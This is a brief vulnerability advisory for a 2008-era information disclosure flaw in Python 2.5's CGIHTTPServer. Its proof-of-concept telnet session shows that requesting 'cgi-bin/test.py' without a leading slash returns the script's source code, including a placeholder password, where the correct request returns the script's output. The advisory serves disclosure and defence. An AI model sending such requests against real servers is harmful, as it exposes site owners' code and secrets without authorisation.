================================================================================
Summary:
================================================================================
An information disclosure flaw exists in standard python CGIHTTPServer
module.
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).
================================================================================
Description:
================================================================================
Requesting cgi script (in example test.py) without / in the beginnig of URL
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.
================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT
#!/usr/bin/env python
print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.
================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache
Hello
Connection closed by foreign host.
================================================================================